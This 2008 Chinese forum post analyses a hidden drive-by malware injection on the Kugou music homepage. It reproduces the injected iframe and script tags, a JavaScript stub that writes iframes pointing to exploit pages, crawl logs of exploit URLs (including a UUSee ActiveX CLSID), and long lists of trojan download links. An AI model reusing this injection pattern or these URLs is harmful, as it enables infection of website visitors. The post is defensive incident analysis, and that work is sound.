|
|
楼主 |
发表于 2008-6-26 11:20:21
|
显示全部楼层
|阅读模式
来自 河南省郑州市
作者: yimike
来源: 剑盟
近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。
详细过程如下:
1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:
<IFRAME marginWidth=0 marginHeight=0 src=”cairing.htm” frameBorder=0 width=230 scrolling=no height=327></IFRAME>
这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm
2.每个独立IP首次访问h**p://www.kugou.com/home/cairing.htm这个页面时,源代码里会有一段代码如下:
<IFRAME id=cif123 src=”h**p://count12.5lyes.net/sa.aspx?s1=0&s2=121****5605&s3=825****1791&s4=100****2043&s5=621d5&n=0.598****7271″ width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src=”h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001″></SCRIPT>
相同IP再次访问该页时则不会有该段代码,也就是说酷狗音乐首页的挂马很可能跟此有关。
3.某IP首次访问h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001这个个页面时,会读取本地coockies,检查是否登陆过酷狗,然后获取酷狗ID等。
根据这些信息,生成一个iframe,并写入。这个IFRAME,也就是第2步中的51yes的那行代码了。
于是访问该行iframe。
4.就在访问该iframe中src的地址时,收到了一个奇怪的无关链接:
h**p://qq.bcccd.com/112****5595_190****7258_100****2043_9b9570a2a32***04abea8c96b57***30.html
查看该数据包,详情如下:
注意看黄色高亮部分,也就是说上面这个无关连接引用自51yes.net的链接,也就是第二部中的iframe的地址。
通俗点的理解就是,当访问第2部中的指向51yes.net的iframe时,51yes.net的服务器返回了这个“无关”链接。
5.紧追该“无关”链接,得到的代码是:
<script type=”text/javascript”>
//window.setTimeout(’goo();’,1*60*1000);
goo();
function goo()
{
document.write(’<iframe width=100 height=100 border=0 src=”h**p://ok.dessp.com/mmmgo.htm”></iframe>’);
document.write(’<iframe width=100 height=100 border=0 src=”h**p://ie.ietop.com/ms.htm”></iframe>’);
document.write(’<iframe width=100 height=100 border=0 src=”h**p://arp.aafrp.com/mmmmgo.htm”></iframe>’);
document.write(’<iframe width=100 height=100 border=0 src=”h**p://mm1.yaoch.com/mmgo.htm”></iframe>’);
//document.write(’<iframe width=100 height=100 border=0 src=”h**p://ok.dessp.com/m212****5595_237****3072_100****2043_f91***77f09fe5814ae062efc4cfff348f.html”></iframe>’);
//document.write(’<iframe width=100 height=100 border=0 src=”h**p://mm1.yaoch.com/m121****5595_237****3072_100****2043_f91***77f09fe5814ae062efc4cfff348f.html”></iframe>’);
//document.write(’<iframe width=100 height=100 border=0 src=”h**p://arp.aafrp.com/s121****5595_237****3072_100****2043_f91***77f09fe5814ae062efc4cfff348f.html”></iframe>’);
document.write(’<script src=”h**p://service.o00o.cn:8081/click.aspx?id=test_2″><\\/script>’);
}</script>
<script src=’h**p://s35.cnzz.com/stat.php?id=81***50&web_id=81***50′ language=’JavaScript’ charset=’gb2312′></script>
此时,酷狗音乐首页挂马的原因已经明晰。此次挂马是由两点引起的:
1.h**p://www.kugou.com /home/cairing.htm被植入恶意代码:<SCRIPT language=javascript id=clickjs src=”h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001″></SCRIPT>
2.计数站点5lyes.net的sa.aspx的代码可能代码被黑客入侵后遭受了恶意修改;或者是机房存在arp病毒导致sa.aspx被感染恶意代码(后者可能性不大)
PS.以上部分链接需要结合本地coockies才能访问
下面分析下挂的马:>
Log is generated by FreShow
[wide]http://ok.dessp.com/mmmgo.htm
[frame]http://www.jsp369.cn/a1.htm
[frame]http://www.regedit369.cn/index.htm
[frame]http://www.regedit369.cn/Ms06***14.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/cuteqq.htm
[frame]http://www.regedit369.cn/Ajax.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Ms06***14.htm
[object]http://d.yuku369.cn/max.exe
[script]http://www.regedit369.cn/Real11.gif
[object]http://d.yuku369.cn/max.exe
[script]http://www.regedit369.cn/Real.gif
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Bfyy.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Lz.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/flash.htm
[frame]http://www.regedit369.cn/ilink.html
[object]http://www.regedit369.cn/i115.swf
[object]http://www.regedit369.cn/i64.swf
[object]http://www.regedit369.cn/i47.swf
[object]http://www.regedit369.cn/i45.swf
[object]http://www.regedit369.cn/i28.swf
[object]http://www.regedit369.cn/i16.swf
[frame]http://www.regedit369.cn/flink.html
[object]http://www.regedit369.cn/i115.swf
[object]http://www.regedit369.cn/i64.swf
[object]http://www.regedit369.cn/i47.swf
[object]http://www.regedit369.cn/i45.swf
[object]http://www.regedit369.cn/i28.swf
[object]http://www.regedit369.cn/i16.swf
[frame]http://www.regedit369.cn/uuc.htm
[frame]http://www.regedit369.cn/UU.ini
[object]http://d.yuku369.cn/UUSee.CAB
Log is generated by FreShow.
[wide]http://ie.ietop.com/ms.htm
[frame]http://www.worka.net.cn/a1.html
[frame]http://www.worka.net.cn/add.html
[frame]http://www.flashl.net.cn/lg.html
[frame]http://www.flashp.net.cn/1.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/l.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/bf.html
[frame]http://www.flashp.net.cn/UUUpgrade.ini
[object]http://www.flashp.net.cn/UUSee.CAB
[frame]http://www.flashp.net.cn/r.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/nr.html
[object]http://www.sarvt.cn/google.exe
[object]http://www.tygvb.cn/4562.swf
[object]http://www.tygvb.cn/4561.swf
Log is generated by FreShow.
[wide]http://arp.aafrp.com/mmmmgo.htm
[frame]http://cv.vkhys.org.cn/vkhys/aa1.htm
[frame]http://cv.vkhys.org.cn/f.htm
[frame]http://cv.vkhys.org.cn/ilink.html
[object]http://cv.vkhys.org.cn/i115.swf
[object]http://cv.vkhys.org.cn/i64.swf
[object]http://cv.vkhys.org.cn/i47.swf
[object]http://cv.vkhys.org.cn/i45.swf
[object]http://cv.vkhys.org.cn/i28.swf
[object]http://cv.vkhys.org.cn/i16.swf
[frame]http://cv.vkhys.org.cn/flink.html
[object]http://cv.vkhys.org.cn/f115.swf
[object]http://cv.vkhys.org.cn/f64.swf
[object]http://cv.vkhys.org.cn/f47.swf
[object]http://cv.vkhys.org.cn/f45.swf
[object]http://cv.vkhys.org.cn/f28.swf
[object]http://cv.vkhys.org.cn/f16.swf
[frame]http://cv.vkhys.org.cn/bx14.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/r10.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/r11.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/bxlz.htm
[object]http://dm.xcvgj.org.cn/gd.exe
Log is generated by FreShow.
[wide]http://mm1.yaoch.com/mmgo.htm
[frame]http://aaa.udd05.cn/xb.htm(找不到该页)
以上挂马中值得注意的是,近期新爆UUSEE网络电视的漏洞已经广泛被用于挂马,涉及的CLSID是2CACD7BB-1C59-4BBB-8E81-6E83F82C813B,请UUSEE用户重新到官网下载最新的UUSEE安装包重新安装或者是卸载UUSEE。
所挂的马中,max.exe和uusee.cab解压后的exe下马相同,google.exe和uusee.cab解压后exe的MD5相同,gd.exe不是下载者,不下载木马。
max.exe连接http://d.yuku369.cn/ble1.txt,下载35只木马:
h**p://jan1.fdsjan.cn/max1.exe
h**p://jan1.fdsjan.cn/max2.exe
h**p://jan1.fdsjan.cn/max3.exe
h**p://jan1.fdsjan.cn/max4.exe
h**p://jan1.fdsjan.cn/max5.exe
h**p://jan1.fdsjan.cn/max6.exe
h**p://jan1.fdsjan.cn/max7.exe
h**p://jan1.fdsjan.cn/max8.exe
h**p://jan1.fdsjan.cn/max9.exe
h**p://jan1.fdsjan.cn/max10.exe
h**p://jan1.fdsjan.cn/max11.exe
h**p://jan1.fdsjan.cn/max12.exe
h**p://jan1.fdsjan.cn/max13.exe
h**p://jan1.fdsjan.cn/max14.exe
h**p://jan1.fdsjan.cn/max15.exe
h**p://jan1.fdsjan.cn/max16.exe
h**p://jan1.fdsjan.cn/max17.exe
h**p://jan1.fdsjan.cn/max18.exe
h**p://jan1.fdsjan.cn/max19.exe
h**p://jan1.fdsjan.cn/max20.exe
h**p://www.fdsjan.cn/max21.exe
h**p://www.fdsjan.cn/max22.exe
h**p://www.fdsjan.cn/max23.exe
h**p://www.fdsjan.cn/max24.exe
h**p://www.fdsjan.cn/max25.exe
h**p://www.fdsjan.cn/max26.exe
h**p://www.fdsjan.cn/max27.exe
h**p://www.fdsjan.cn/max28.exe
h**p://www.fdsjan.cn/max29.exe
h**p://www.fdsjan.cn/max30.exe
h**p://www.fdsjan.cn/max31.exe
h**p://www.fdsjan.cn/max32.exe
h**p://www.fdsjan.cn/max33.exe
h**p://www.fdsjan.cn/max34.exe
h**p://www.fdsjan.cn/max35.exe
其中34、35文件不存在,下到33只
google.exe下载35只:
h**p://www.irwxg.cn/down/e1.exe
h**p://www.irwxg.cn/down/r2.exe
h**p://www.irwxg.cn/down/a3.exe
h**p://www.irwxg.cn/down/j4.exe
h**p://www.irwxg.cn/down/y5.exe
h**p://www.irwxg.cn/down/m6.exe
h**p://www.irwxg.cn/down/r7.exe
h**p://www.irwxg.cn/down/i8.exe
h**p://www.irwxg.cn/down/x9.exe
h**p://www.irwxg.cn/down/l10.exe
h**p://www.rwxow.cn/down/b11.exe
h**p://www.rwxow.cn/down/z12.exe
h**p://www.rwxow.cn/down/m13.exe
h**p://www.rwxow.cn/down/n14.exe
h**p://www.rwxow.cn/down/o15.exe
h**p://www.rwxow.cn/down/g16.exe
h**p://www.rwxow.cn/down/j17.exe
h**p://www.rwxow.cn/down/l18.exe
h**p://www.rwxow.cn/down/c19.exe
h**p://www.rwxow.cn/down/t20.exe
h**p://www.werxv.cn/down/p21.exe
h**p://www.werxv.cn/down/x22.exe
h**p://www.werxv.cn/down/m23.exe
h**p://www.werxv.cn/down/o24.exe
h**p://www.werxv.cn/down/b25.exe
h**p://www.werxv.cn/down/e26.exe
h**p://www.werxv.cn/down/v27.exe
h**p://www.werxv.cn/down/m28.exe
h**p://www.werxv.cn/down/u29.exe
h**p://www.werxv.cn/down/h30.exe
h**p://www.werxv.cn/down/b31.exe
h**p://www.werxv.cn/down/c32.exe
h**p://www.werxv.cn/down/u33.exe
h**p://www.werxv.cn/down/f34.exe
h**p://www.werxv.cn/down/p35.exe
全部链接有效,下到35只。
除swf外,全部样本共计72只:mm.7z (923.12 KB)
至此,酷狗音乐首页挂马分析清楚。 |
|
发表于 2008-6-26 15:47:54